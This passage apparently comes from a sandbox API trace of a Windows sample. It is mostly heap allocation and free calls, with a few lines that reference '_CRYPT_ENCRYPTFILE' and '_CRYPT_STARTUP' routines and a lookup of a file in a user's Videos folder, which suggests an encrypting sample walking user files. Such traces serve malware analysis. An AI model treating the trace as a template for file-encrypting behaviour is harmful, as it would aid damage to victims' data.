(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0100.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0100.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0100.691] FreeLibrary (hLibModule=0x772d0000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.691] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0100.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0100.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0100.692] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0100.692] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0100.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ef0 [0100.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0100.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0100.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0100.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0100.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0100.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0100.693] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0100.693] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0100.694] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0100.694] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.694] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0100.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0100.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0100.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0100.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.696] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.696] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\0l3d58qA0oi.mp4", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11566390, ftCreationTime.dwHighDateTime=0x1d5f028, ftLastAccessTime.dwLowDateTime=0xe65173c0, ftLastAccessTime.dwHighDateTime=0x1d5ed97, ftLastWriteTime.dwLowDateTime=0xe65173c0, ftLastWriteTime.dwHighDateTime=0x1d5ed97, nFileSizeHigh=0x0, nFileSizeLow=0xb24b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="0l3d58qA0oi.mp4", cAlternateFileName="0L3D58~1.MP4")) returned 0x41ac780 [0100.696] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0100.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0100.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0100.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0100.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0100.697] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0100.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0100.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.698] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0100.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.699] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0100.699] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0100.699] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0100.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0100.699] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0100.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0100.700] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.700] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0100.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: 